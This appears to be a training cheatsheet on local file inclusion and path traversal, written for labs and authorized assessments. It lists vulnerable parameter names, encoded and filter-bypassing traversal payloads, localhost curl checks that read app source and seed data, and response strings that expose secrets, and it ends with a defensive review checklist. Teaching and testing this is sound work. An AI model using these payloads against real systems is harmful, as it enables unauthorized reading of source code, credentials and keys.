Operator On The Wire
← Back to Knowledge Base
OOTW / Chapter III - Web / 05. LFI

Cheatsheet

Use this as a quick reference while testing LFI and path traversal in labs and authorized assessments.


Common Parameters

file
path
page
template
theme
lang
locale
view
document
download
include

Lab Targets

Normal pages:

welcome.txt
status.txt
help.txt

Cross out of the public page directory:

../private/internal-config.txt
../../app.py
../../seed.sql

Extension-appending stage:

../private/internal-config

Traversal Payloads

Basic traversal:

../
../../
../../../

Windows traversal:

..\
..\..\

One-pass blacklist bypass:

....//
....//....//

URL-encoded traversal:

..%2f
%2e%2e%2f
%2e%2e%5c

Double-encoded traversal:

%252e%252e%252f

Lab curl Checks

Normal file:

curl -i "http://127.0.0.1:5000/lfi/basic?page=welcome.txt"

Basic exploit:

curl -i "http://127.0.0.1:5000/lfi/basic?page=../../app.py"

Seed data proof:

curl -i "http://127.0.0.1:5000/lfi/basic?page=../../seed.sql"

Weak blacklist bypass:

curl -i "http://127.0.0.1:5000/lfi/blacklist?page=....//....//app.py"

Extension-appending bypass:

curl -i "http://127.0.0.1:5000/lfi/better?page=../private/internal-config"

Fixed route:

curl -i "http://127.0.0.1:5000/lfi/fixed?page=../../app.py"

The fixed route should return 404 Not Found.


Response Clues

from flask import
sqlite3
CREATE TABLE
SECRET_KEY
api_key
reset_token
No such file
Permission denied

Useful comparisons:

status code
response size
first lines of body
error message
audit event

Filter Bypass Ideas

If ../ is removed:

....//
..%2f
%2e%2e%2f

If .txt is appended:

../private/internal-config

If only the filename is expected:

../../app.py

If absolute paths are allowed, the base directory may be ignored by the path join.


Defensive Review

Confirm:

  • The application uses page IDs instead of raw file paths.
  • Allowed IDs are mapped server-side.
  • The final path is resolved before reading.
  • The resolved path must stay inside the intended directory.
  • Absolute paths are rejected.
  • Extension checks are not the only control.
  • Traversal attempts are rejected, not cleaned.
  • Sensitive files are not reachable by viewer routes.
  • Rejected paths are logged.